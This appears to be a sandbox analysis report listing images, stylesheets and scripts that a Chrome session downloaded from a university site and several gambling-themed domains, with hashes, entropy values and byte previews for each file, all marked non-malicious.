                                          Preview:...........=]s.Hr.E.).....].yIC.Y....-..='..T...X.....u.RWyK%y...%/..T.5...%......J.E.cf0...d..)[e........t.....(..S.<I.,O.ik...dh.V....q....d./.0M..U.M..{1..y...SY..UuUE....E%g...,....A.y..<...<..qx.H:..l...:.....'zA2..{'....+~ ..4....1b.......d..e.I}......0.a...y..K;.....,....5...(......Y{..;...(......=."k......t..)C..4M...v.Y...Y....).{.~.......'=7...........Y>.2..t.w..W..h.0..V........?x.t.......'.>..4.._W..^.r........0...%.!....E.?..a.+..<..C/./.::.}.....}..hJ...(oix.4.W...u.0?.&a2......x.-.J.v..U4......j.F.:.B.G.....v....8....EW.,..W..X...-.>........\....s..H....B...........:..l.\...L..p...@.-Is.....^2...<.M........0.2.A...'.3.-.].4..(L-..E.h...ey..>..a~.f.$....h[#.=..Yf9..................r...Y..\......^_[[...E...z..........~.....G).y2..9.hx...).f.`X...rP.....u....!........u.i.i.&?.R.YG....`/..+...p.[..Q.?v.wB..2wHUf[V..7-o.O..b..x,..m./...G.-.az.ZY8..9...PS;s..7.R."I'..!I....3...d...G......x:.O.`.........`,.*...}.+...f.E(..$>..p......1...#..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 692 x 520, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):1442284
                                          Entropy (8bit):3.519017284151463
                                          Encrypted:false
                                          SSDEEP:6144:Twa8IgDoEyNun/MtW3ioFzdHb19NIpmw1uvMP3KhuTvx2RO6zRAP:0arOGNu/Mt/+3NIpmw1HP3Y8vKeP
                                          MD5:247D44F14A7A9A01E0D52B998F0FADA0
                                          SHA1:35CE6E6E9097BEB634291282AC4626DD4507C5B2
                                          SHA-256:BDC713F840C5CE0CAB78B157B2C33F1FFF50825B5FDC6F76447BCF1FEB6B794B
                                          SHA-512:1B1C487BD0124857716A640AA98BA0406C73E251B0FE8B2DF8AA4B98BA9868F010BBAD8BE55F253492909CF0A55EBB3CD206332EC00CFFCB80D46903BD3CE898
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/__local/2/47/D4/4F14A7A9A01E0D52B998F0FADA0_DD410FA8_1601EC.png?e=.png
                                          Preview:.PNG........IHDR..............6}.....pHYs...t...t..f.x.. .IDATx...3~...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:assembler source, Unicode text, UTF-8 (with BOM) text, with very long lines (311)
                                          Category:downloaded
                                          Size (bytes):19716
                                          Entropy (8bit):5.100562841963931
                                          Encrypted:false
                                          SSDEEP:384:x5X4+nPLZ8IznE/aUcM+4VPACO90pnhtjGMd42:A+nPL8czo3htjGMG2
                                          MD5:E27166D661E2BF5353E49A6171EDD474
                                          SHA1:8111915C0A316C8532F6547C458BB97CC4CA665A
                                          SHA-256:92513E519E9E247930C91D719E6CFA16352400C09BFD8921460421AD02AE055A
                                          SHA-512:B1DAE78FF99DEB63041C08BD04E0349A2B784D62790ADB6F699B9C2C511DADF5D4C9DB4F6DF4376AA3CE86484294AC9E4F8CCEDD947BA6EE91991452D6AB68A8
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/bet365-1761/themes/style/common.css
                                          Preview:../* .... */....a, a:hover {text-decoration: none;}../*==================== common .. ====================*/.body{font-family: 'Microsoft YaHei',"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;background-position: center; }.ul,ol{list-style:none;}..container{width:1300px !important;margin:0 auto;padding:0;}..banner .page-banner{height: 300px;background-position: center bottom;background-repeat: no-repeat;}..header .header-top>.container{height: 38px;background-repeat: repeat-x;display: flex;}.header .header-top>.container .notice{flex: 1;}.header .header-top>.container .login{border-left: 0.5px solid #d0d5da;height: 38px;padding: 0 8px;display: flex;align-items: center;}.header .header-top>.container .login .login-btn{width: 100px;background-color:#fff;color: #000;height: 26px;border:.5px solid #14805d;display: inline-block;text-align: center; }.header .header-top>.container .login .register-btn{width: 100px;height: 26px;background-color: #14805d;color: #fff;
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 117368
                                          Category:downloaded
                                          Size (bytes):19659
                                          Entropy (8bit):7.986741631019542
                                          Encrypted:false
                                          SSDEEP:384:LhS5Hs/1NotC0O5tbj1Koyw7kioIQgp51SEZIb+HDVBDSci:d6H01eCDPv1Koyw1bVp51So7Pi
                                          MD5:ABA756C14574AD2583F2C2208A43F6F4
                                          SHA1:4A82F3DB1F58AD88C130B5A64B9750EB6FB904E6
                                          SHA-256:CF69493A023C7ED0D84A9E94865B90B3D268BAA9D1FABC68F7548048836556CC
                                          SHA-512:9BFD3E8089C79AE223F1E95E0A8FEA5109DAEDCF9072A0E62F723A49D75B943F4570EB74CFB953BE37BABD961F5001FB2DF12A7C69A3C077420B16E47F0A0009
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/bootstrap/bootstrap.min.css
                                          Preview:...........}k..8.._.TGGWM..Y~.3..fc7bw?.~..p..}..$.5-[.I.G;|...&...........4.. .. D...P^v...CQ~{l.c3i..=M..._.v.._.IS..O../.}.E..O.CC.\.U..rH....]..-.2.'M...,o..l..%MNmQ....:.....>O2....:...8....<>&..M.........dEs*.o..J..&..ir..4.S]..y.?.^+.Y...OD...9'-)'IY....I..Z...X...J.g.l~.`P..c....}.F.............kr.&.|,.l.VeU?.5..)..c{M..6..9....s..-'..m...j.....l...d...:<.N_G..3..q..;.H.~.Dm.2.f..,l.oe.X.l..u?.r....a.=I.&..8?\Y..I.wQ.=Y.....ksHJ......vsfT.O.S..\:.u.....p...?..k..y.1...q2]2z....d......x.|~.bz...|.p.......U*...w...^....U|[}...G.r&.^.t..-TG._O.GCHrn.kZ1..u.1...Mr89..P.+..i>6...1...3c.q\.O.v\.Z93...l....t)1.M4fz.gS.}.....H.fJ....ESlK].._........l9..c$....v..|'...2....EeL....^4...)OX'i.(.<..a....q.V]..V.h.~....j...\......J..8..."...S.e\.L....T.#.CR^.x.}...d....e...(.....*..P..p<..y...6,...9.... <[z\x=K..;.c.J...^7{....*.+r..Q4X.e.$.Jj..&Y.Vu...J#.....&.....j4..b.5..'=.G... .V7UYd.......K~.(]3S.]>......6.|....).S.?.?.m6n....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1000 x 200, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):16171
                                          Entropy (8bit):7.957091246891598
                                          Encrypted:false
                                          SSDEEP:384:reyaj11iAYigzr+UggEO+SWnbpsGTfW2XipW0VzRyYOAqW:Kyi1sATgPZE8WbDFXJ0tI2f
                                          MD5:C0C473FF65D53364B57BAE47C1309DDD
                                          SHA1:62117432116DC2CF7C9DB76F20301D011E6C33B5
                                          SHA-256:6ED60433BD74F4340F70783C9037C1614A6578188642F74AEDF451101EBFB3E8
                                          SHA-512:0D0DEDBE83A264DB883CA08B7F9DE8174B9C21F1D9A911B0CA21382E62B9B9464B95785206594CF8EFA72B856A33A40CD23A73327CB6364428863D0768D49961
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR.............L9;}....PLTE.....l.......59......r........&..*.r2.V6.F6........"..*....."...\.T..'5.|..........)..b6J...1.........l.>...t...........&.!*..74.`.~2..[ .u.9.....(.f......6...."B...6..D...:..+.....b../X.........3h.F.\..'.{....>?.....!G....t.K... `...VW.....2.....>e.Iy....J.....(L.^.....n..z.......O....6..........w.............*..I....D.S...G...d...MQW............,4C....,.............".t..........?........f...9..HK.......~...l.*'.#....#x...........G...|....../......~........a...bm..`[.........wt..Y.............O.........hj.[X....?<...."...6<...7.P...h..:Z#........p'}.wG..0......g[,...........X.t...V5..BJ.44.N.F.x..Z....2.n.n..f+....tRNS.@..f..<WIDATx...1k.0...K......n..C.................U...]..^.$.1...].!r...9 .....9 .....9 .....: .....9 .....9 .....: .....9 .....: .../.`....y..?....sUcB.6E..Uf.g........&S[!t<.5..8...mb't..E.q...j5B.P0...n..1%k..\.3<..Py..N.k.Z..1f......Q..:.3..._....m.(.~]].Ir......:...y..o....{.]./oNc.}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (831), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1329
                                          Entropy (8bit):5.5382888091440465
                                          Encrypted:false
                                          SSDEEP:24:Q2UpeK+C6uSgSYknsJ4sS8XovsNNyNShcUn2T2XOwOQkn5cULVztt4CtkxKP5Jhr:io1CTXA+S8OszyScg5A5cARC6kxKfhth
                                          MD5:7D62C6043B946796B8446A113629E597
                                          SHA1:650F80553B43A5518814A92F1185ECD3D31A13FE
                                          SHA-256:AC09FF2C779832D9DF2E3370A647BCE1422ADA5E0FAA7195B135A03559C61B56
                                          SHA-512:E4A426530931AF08229F539B6547D88AC393F24D5E0422D86A65134E0AC4608C2966C16120D2426E5F3E3EEA5313F1143CC35AD37FC537D79A009B679A5067F2
                                          Malicious:false
                                          Reputation:low
                                          Preview:.var _jsq_image = new Image();..function _jsq_encode(){_keyStr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";this.encode=function(a){if(a==null||a==undefined||a=="")return"";var b=new Array();var c,chr2,chr3;var d,enc2,enc3,enc4;var i=0;a=_utf8_encode(a);while(i<a.length){c=a[i++];chr2=a[i++];chr3=a[i++];d=c>>2;enc2=((c&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2)){enc3=enc4=64}else if(isNaN(chr3)){enc4=64}b.push(_keyStr.charAt(d)+_keyStr.charAt(enc2)+_keyStr.charAt(enc3)+_keyStr.charAt(enc4))}return escape(b.join(''))};_utf8_encode=function(a){a=a.replace(/\r\n/g,"\n");var b=new Array();var d=0;for(var n=0;n<a.length;n++){var c=a.charCodeAt(n);if(c<128){b[d++]=c}else if((c>127)&&(c<2048)){b[d++]=(c>>6)|192;b[d++]=(c&63)|128}else{b[d++]=(c>>12)|224;b[d++]=((c>>6)&63)|128;b[d++]=(c&63)|128}}return b}}..function _jsq_(treeid, pagename, newsid, owner)..{.. if(window.top != window).. return;.. .. var c = navigator.appNam
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 22006
                                          Category:downloaded
                                          Size (bytes):7599
                                          Entropy (8bit):7.968812814531643
                                          Encrypted:false
                                          SSDEEP:96:UCnHGpv0J0C/Iy2hh3zrHg+Gd7mhLabhwHp0KuClDpEclAdCX+gZc:UCnM0Jz/Iy2LrHgz7WL0qplINic
                                          MD5:84191D1091731FC35BABF501FF6A08BF
                                          SHA1:13F401266FC74700486A120BB0DF31E00152F492
                                          SHA-256:51BAE893893C406293BF77A7D6B84E7741607005BD99A64BC9E9BE8F3A2A13F0
                                          SHA-512:767A734B8FE2EAF78FADB068CE5629DC20BC917E87C6D954FFC3E36E8386DE6B3FA4306C1AC690F7E0562FCB97338C80AAE94B7B98C233C21E1A842147117817
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/layer.js
                                          Preview:...........<.n.Hr...2.".+..d.=C..ffg..fs..A..Z........-.x-.I.(y..A....erH.#U...(..&0`.?.]].U...Nzy.....y0.........../...........y...>KYQ.^o..&:;.......\..z..z.........Wg...,.E..p..Gg./..R.L......L....l.../..;....U.G...-./.t.f....6..y.f0.+..j8..Y.mU:....`......r.:kV.1..*.U..z{.@.wn.g.K......7K.9s........2....>+...........-y4.....fN.W..._....W/^N......}.U._?.>q.>..0..........lY%k|..d.P...65.....?.A..3.....n...B].v1b....z.(XP..[l..H<......*7......[6u.5N..t.n...<+>Z@.........O@.4T.......W.........%...s.n...K8..].'r..#...1.\..y.".<.<v..{A.6y.2...`.....8........ ..8...5.aT.K.b.;~..*........"^..kx..n............*..n...B........Z`.0Ho..S.bT.e..}....*+....0G.w.}.g..........q.o..f..Ge...=...|..|.R0.\/.....Y........,....*~.........$.H...U..]....x.....I.\.^''..^.........|.s....=...]......u...k....;.....l4..F#.d2#.#...~_>....{.b......E...*I2?..n.B.(N....@..}.@S..U..<_...G..N......(.:.......a....1Y<..U...L.vL.....b.b..*t.3P==X1J....P.l..*.....Jq........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x376, components 3
                                          Category:downloaded
                                          Size (bytes):333374
                                          Entropy (8bit):7.979357166765808
                                          Encrypted:false
                                          SSDEEP:6144:Eq+cpjoXXG2Ja+8zp9ULM/EWRchd3GEqZZme3TocOayvDxcpgeleqrMctEbIPvCp:jfomOs9UrWRYVGYe3T1yS1lDrdE8vIN
                                          MD5:94C27B7C4E6860EF166578E96DC750B2
                                          SHA1:7E87EAB31DC751541D7C021BC226D7F20D9EC912
                                          SHA-256:41E08C5BF5654F0ED5D02CCDFB6CFB8C633E6FAA7322E112A6989DB237AD3C10
                                          SHA-512:3BDF2026E06C00823F40E78399C79A938F589A922065071E13B0B2D2AAE40C5594352CD3130790DD0F81CFABC88DFBC8ECC3B1B2DEF6B7367150E6E37DA6DB86
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-2.jpg
                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................x...............................................V............................!."1A.#2Q.aq.$3B..R..%Cbr..4S..&c......Ds....5T....d.....................................H.........................!1AQ.."aq..2......#BR..b..3r$..C.....4%Scs.D.............?..~ ..Y..8........x7..5.....n6*...hJ....T^>j...u>I..o...v...uUO.."_$...yYy.Z+{.._.P..Hc.....5..l.T.EO..d.P........n7..!i0...0'......Z...}.A.........O.w.po.....cylm..;...Hf0.J..J.Jt..k.{.mQ....*>.......-./.3....u`.+]AR..U..g...}..^.........Q5E.... .. ....Y...s.\...K1...hb.Pz*..y..4I.Jyz..{...O...;......6=.....X..B...$slj.....M.O..[O:J....)."..Gvy.i&..{/....*.b....op<..E^e.d...,rue_.B.O;..oCkW.J...<.R.N.b)....U.^,....hF.5..)...f!W...G.....7*.Z...qK.f..PB..7..'.[Q`....I.]D.m...D..E$.|v....d....E.D.......|.6.I2......0..z...}v....ih...&......
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):927
                                          Entropy (8bit):5.8234641292335105
                                          Encrypted:false
                                          SSDEEP:24:l1hiyWwjx82lY2T37V9QYaAldM6yJ3V9ihaB/G0u:LuNn2vfmKdCJ3fvZvu
                                          MD5:F0C81F4E76558FD0CC483FF85D038024
                                          SHA1:1CF7F291BE455523C140445E92EF3BEDE84AB931
                                          SHA-256:2B8A3DDBC4BCF2326E62B0A55708AC72B37578FD9D1DAA47EDB9565B2F312D4F
                                          SHA-512:D9FEB390CBB5A0202898D890120E93A049C263C8AA6B6DC168DB0F4056C97B6D80BBC98E287FD0D97A3619C2A914AFBA17B462379975E3B33BD052F9CF45C080
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:16C1369DC91811E7A5F5EA689ABD845E" xmpMM:DocumentID="xmp.did:16C1369EC91811E7A5F5EA689ABD845E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:16C1369BC91811E7A5F5EA689ABD845E" stRef:documentID="xmp.did:16C1369CC91811E7A5F5EA689ABD845E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx.bb``X..`.......g....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (4600)
                                          Category:downloaded
                                          Size (bytes):332080
                                          Entropy (8bit):5.1826971886837825
                                          Encrypted:false
                                          SSDEEP:3072:xc0gFcCVygP4143DNDeYRY75B5HxognWCLmuCEsAlsrluhIextV:xc/6CVygP4143DND8bmuCEsAlsrluh/P
                                          MD5:870D91F92B138B4C7DDF25DA63C1851D
                                          SHA1:9D1668A5112DF529A9766C73A736F7F35F7BEEF8
                                          SHA-256:3C931825B8536F9369E5C76DA6F434FF94DFE0D9C4B8E900084A36FEC7F71B6A
                                          SHA-512:F91B3DD45D21D39F37FB7D02E82588C95222C1727D64761E112598C8B59D6551EF37CA78BBAC08A57F92A3011B7A5CEEC81671F1A9C4CA48AFC89725C7C63410
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/css/style.css
                                          Preview:#app {..text-align: center.}...display-flex {..display: flex.}..html[data-v-5371a066] {..-ms-text-size-adjust: 100%;..-webkit-text-size-adjust: 100%;..font-size: 62.5%.}..[data-v-5371a066] {..margin: 0;..padding: 0.}..a[data-v-5371a066] {..outline: none.}..a[data-v-5371a066],.a[data-v-5371a066]:hover {..text-decoration: none.}..html[data-v-5371a066] {..zoom: 1.}..html [data-v-5371a066] {..outline: 0;..zoom: 1.}..html button[data-v-5371a066]::-moz-focus-inner {..border-color: transparent !important.}..body[data-v-5371a066] {..overflow-x: hidden.}..blockquote[data-v-5371a066],.body[data-v-5371a066],.code[data-v-5371a066],.dd[data-v-5371a066],.div[data-v-5371a066],.dl[data-v-5371a066],.dt[data-v-5371a066],.fieldset[data-v-5371a066],.form[data-v-5371a066],.h1[data-v-5371a066],.h2[data-v-5371a066],.h3[data-v-5371a066],.h4[data-v-5371a066],.h5[data-v-5371a066],.h6[data-v-5371a066],.input[data-v-5371a066],.legend[data-v-5371a066],.li[data-v-5371a066],.ol[data-v-5371a066],.p[data-v-5371a066],.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):9166
                                          Entropy (8bit):7.943044395390699
                                          Encrypted:false
                                          SSDEEP:192:6SR6qSQiN4jFrNuFYJzUYUbI04bYPaJBxKqZcGVlX:1R7GKT8YzUYON4b6sOqZcQX
                                          MD5:2DC231BC7104153AD42E898E7D4E6779
                                          SHA1:9ABD8A5A5CF86DC95EEB72F882B40E69E2A7D23E
                                          SHA-256:1A622555817668F36C77A472DACE4390AA8C2160A1AF60330E9DC04DE9F91E4F
                                          SHA-512:0EF4E68315EE37E5AC0A947085101E55930F6956DB6B01D324012FA709108C375AD2388E699920D6B29CCBD8026399F035C8F657A7D27673C96CB8079783B489
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/sansanqiqi.png
                                          Preview:.PNG........IHDR..............X......pHYs...............#.IDATx..{.]Gy.._.;#..X..F...m..........`B...]*...`IQ.qv.X.J.lR..d.J.j!DKBB.3.......v...%.H.=...H..5sO..G.;s.....s..H..X#.>..._?...kQU".Hg.r....d..D".D..D2....d..$.. *H$.AT.H$.. .H.QA"....D".D..D2....d..$.. *H$.AT.H$.z^...7..(V...~...l. .V.V.}.M...... ..`......Q......(..O$5....q..F.AH.R..:.*....j."...&..T.!A.K..+.....Ke?.....c ...h!...4......xYQj.U.....;c..I..4.[...N._./..~..]..*HW.PV.o.6....K.6.g.2.S...\N..I....P.R`........r..d........i.}.E..r._.l. .>Q9....N...r.'"......MH..(......Y.J.j.q.QR.."TA.5......^..].........s..P._...~.').J........d?......a../.~_...>........YJ.h.....-.<...p /Q....0j...-.Y..,..T.#.~..f.o.1.p@^g |.&.....@...~XE?..].k...t.33.....IU%....c.*G1............eA......o%......<|:.QQ.3A.Z...H.uE.k.....H.r6......z#N.}.YV...._T..,../..g....H:.Z....V._.L...=.d_j].xS.....8...\h.....Z.....W..y*..s...,.r.2l...}...dv....$WA...Q....%...*z..^H.C..(........\....s....b..=.H.Hr?.......}.R.T....GY..z.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):5313
                                          Entropy (8bit):7.933189242085673
                                          Encrypted:false
                                          SSDEEP:96:VB8d47I7O6++59andvI7N2ntL2DvvSq8cWLaQMTC6ANQMIgrkfieWpfmby:V4t7O6x/+pns783L8ANQHxWwby
                                          MD5:759534A3C80E7AD77DEEE14DA3D94CD8
                                          SHA1:12D6FB2D8E7D74D3235E095D3C3C667E539702DE
                                          SHA-256:121DAD2A5CA7AFFDA231FC459B5ECA6E6141E5D58061681D76679436E1DC5FC3
                                          SHA-512:25B27948DE8FBF5C087D82C9571769B6ABF2D8B05DEE7688F33959D659B010D58F032D59666543E5EAC82F26FB00A170E9F5525BFE5BD9768675CFA399BDB908
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2.....UPLTE.....*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*..*...........(.....!........,..o....$..'.....+.................3......../..UON...k......#!3...........?B[>AZ..(...JDH..........q..5../2M0-;...kZSQ)'7......}..mpf[..,..%..e\VB>F<8B%%8........{_WT..,...p..h...................w.xezo`FAH.........z.|h~sdbZV20?-+:...........ulcZi`Y63=..'........|OIH........vvmbri_NHM......................v..n{paQKM.."............vl[*)=........r.ub75B.....s`WO*-I$'C.........y.........mA=A..........{i.....WXkILd................jl.g]I..._bv1.B.....tRNS...[.....1.....|.....y6.....IDATx...[n.0.D..#...@.....T.D..g.....c<.).e].e-}L...Ie{_?.......c..7a..R.....!RB<.........2N..i?S......U..D1......^W...rF....p...7......?:.2.....4.>..........._.2..G_8R..r..ZAU.n:............................?....... ..A:.D.E.E.E.E.E.E.E.E.E.E.E.E.E.E.E._..I.a......$..G..z...D...Q."..DJ.5V.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65451)
                                          Category:downloaded
                                          Size (bytes):89475
                                          Entropy (8bit):5.289540431614111
                                          Encrypted:false
                                          SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakV:AYh8eip3huuf6IidlrvakdtQ47GKl
                                          MD5:12B69D0AE6C6F0C42942AE6DA2896E84
                                          SHA1:D2CC8D43CE1C854B1172E42B1209502AD563DB83
                                          SHA-256:6150A35C0F486C46CADF0E230E2AA159C7C23ECFBB5611B64EE3F25FCBFF341F
                                          SHA-512:A55F55D56899AB440EF0CAE17B28D5CC8F5B9766D1E9BC1A8AC6B89376924B476C1AB0C325497EB5D44AF41F4EBF8EEA236D87A36902244B8A3ECA54994B8711
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/jquery.min.js
                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):648
                                          Entropy (8bit):4.267287996195597
                                          Encrypted:false
                                          SSDEEP:12:gKBcNKRdZwoRQtjfYaRYi0AxCVC3B6EarRPdyj8IjES:FZdRPaRYi0JA3B6EeRXW
                                          MD5:CCDBA8A8ED118A385B33092B30261504
                                          SHA1:E41C77D81641795FC0CCC109C4A058EE5AB94BCE
                                          SHA-256:E28B393862A9191FE08877274EBCBB34D820752593FE4923B20782E5267A4C12
                                          SHA-512:17052CB717CA7A2A392F75A8888C51D363FB7149F3B9664924B38E6A33E7B3596C6AA72A4713B9E35129D0118D9259215AC307D3E95B80EF052707330237A28C
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/system/resource/js/openlink.js
                                          Preview:.function _openSelectLink(selecto, linkname, addclicktimename)..{.. if(linkname == undefined || linkname == "").. linkname = "value";.. .. .. var index = selecto.selectedIndex;.. var option = selecto.options[index];.. .. var url = option.getAttribute("value");.. if(addclicktimename != undefined && addclicktimename != "").. {.. try.. {.. eval(option.getAttribute(addclicktimename)).. }.. catch(e).. {.. }.. }.. .. window.open(url);.. .. if(selecto.selectedIndex != 0) .. { .. selecto.selectedIndex = 0; .. } ..}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):5294
                                          Entropy (8bit):7.937849280289421
                                          Encrypted:false
                                          SSDEEP:96:Q0/zqWkEB5tP/GGhqd+9BWfV2EIWIKJFensiSCLhnLEARybIDf1V7:Q6oEBrPeGhE+bWd7MnsiSuhLpR80fD7
                                          MD5:B5F40F3C38B9464DBFAA82F5FCA1921B
                                          SHA1:1F3CDC4D8CFEBB93899220A15C26943E24973849
                                          SHA-256:0160DE7C57628AFC1694999264E44C99BEB18DFFDB2992BE7D8223ED5F3DDC94
                                          SHA-512:A193D308CEE71CBB01C7675D572134655FBF6778A711422E09EBCEFFB8732ED74D502335655F75D5A783601AB955E640F7978DF7D07A6AD30AD6D06A2713A812
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/weide.png
                                          Preview:.PNG........IHDR..............2......PLTE...&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5%,3&-3...&.5#*2%,2)08#(/. ).#+,3:.'/..$"%,\..\..|.....8>E""')7A....B~.W..,>H .!/HTFLRkqupuz...KPV]..;k~=l.agkV..Z..X..2O][..._.._...........c..G.....=p.^bg3SbOTZ.....! %...Z......16=............>t.49@........?EL<BHx|.ty}...fjoCIN(3<....Z^cTY_...@z....8cvimr5Zj^.....Q....W..e..E........<p.6^p4XhK..B..N..I.....i.....x.......tRNS....[..~1.............IDATx...YR.0....-^c;I...`(.YH...../...<.:...l..2..[1e6)O...>.Y...6..K..S.c.G.@..;.B..tW~...M."s....=?..Q)...!.....z...en|.{&..](.O!x.d...%M......@PT.3....FH-....W.......j.M...9]...9]...9]...9]...9]...9]...9]...9]...9...9.......o=Hg................(.z}$.Q..D0....F.>..@.^..`..#... ...B..>.3r...Z....Y+/X.d.C'u>.II.m..bsU1.|.T.=R=&...q.S..a... .Bm Nx....&.N..T..^:.-.......Co$..W.i..Z^.ASi].A)...2.}g.hx......0..( ...z...Zhq...4[E........=.>H.[{^..7.F.....Up.I]K....u...'f..F...H&..1....X....B{(EK.D..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):5376
                                          Entropy (8bit):7.928626781930389
                                          Encrypted:false
                                          SSDEEP:96:h6DejFCEN1cN7wKzMpHQEIMoORLxmTz3dORfdmysQ65tYHrPq:h6ejFBN1c1wMoH3IMPRLIEsysQ6TF
                                          MD5:2BC1BF08144630D93B1CFAA5FE79A23C
                                          SHA1:1DF219CB9BC37B20E9C14203234A7353C0DE2B5E
                                          SHA-256:2C3818B06418DB8DC6BBE87D667087BDE5D151C24211E9E08911370C1174276F
                                          SHA-512:CD49BA8DA50F8BBAF759C8958AA45F69BC0CB9790D0731F530402936D375CD4100322A2E635A14D28B904DB7454C974303D0E6FDE49E3EEF56B87CC5636BD88D
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/bwin.png
